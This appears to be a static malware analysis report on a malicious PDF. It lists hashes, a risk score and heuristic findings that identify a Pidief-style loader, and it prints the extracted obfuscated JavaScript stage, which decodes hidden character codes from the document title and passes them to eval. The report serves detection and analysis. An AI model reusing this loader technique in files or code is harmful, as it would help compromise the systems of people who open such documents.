Malicious PDF — malware analysis report

Static analysis result for SHA-256 e76ea3e60c5b9b03…

MALICIOUS

PDF

44.8 KB First seen: 2026-05-09
MD5: dcc24e21e19d1db3b62e2b3d0549cfbd SHA-1: 03e908556498d43390adc131269c1cc838e1e1c1 SHA-256: e76ea3e60c5b9b034a7dd4897a271b39db462735b87f33a03fba9104b953598b
Risk score: 86

Malware Insights

The PDF file was flagged as malicious by an ML classifier with very high confidence. It contains embedded JavaScript, which is often used to download and execute further payloads or to exploit reader vulnerabilities. The presence of JavaScript actions and streams strongly suggests an attempt to compromise the user's system. The SHA-256 hash is included as the primary identifier for this suspicious file.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • Obfuscated Pidief-style JavaScript loader (stage not decoded); severity: high; CVE-related; rule: PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    The PDF JavaScript carries a large opaque encoded stage (a letter-delimited array of numeric character codes) that is built to be decoded and passed to eval, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family: a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap spray pushes it to malicious.
  • JavaScript action; severity: low; 1 related finding; rule: PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream; severity: low; rule: PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0xB071
Size: 470 bytes
SHA-256: c16ecf4c11960ecd06ebfd7c976770e08dea0cb23742e495b6980d3f60e52a22
Script preview (first 1,000 lines of the extracted script):
uhk='';
v='s'+'u';
try{try{qwe()}catch(a){gsdg()}}catch(e){v+=('wqg','b'+'st');}
qwe = ('webweb',v)[v+'r'];
t='le';
a=["e","a","n","b","w",'v','r'];
e=(t,qwe)()[a[0]+a[5]+a[1]+(a,t[0])];
ybpn=e('ti'+'tle');
s=ybpn.substr(t.length + 8,3)+'str';
q=ybpn[s](1,(1,9));
rnd=e('S'+'tring.fro'+q);
q=ybpn[s](14).split('u');;
e('k=q.length');
for (i = 0; i != k; i+=2) {
	vaayx = parseInt(q[i+1]) + parseInt(('erybjkerl',q[i]));
	uhk += rnd(vaayx);
}
e(uhk);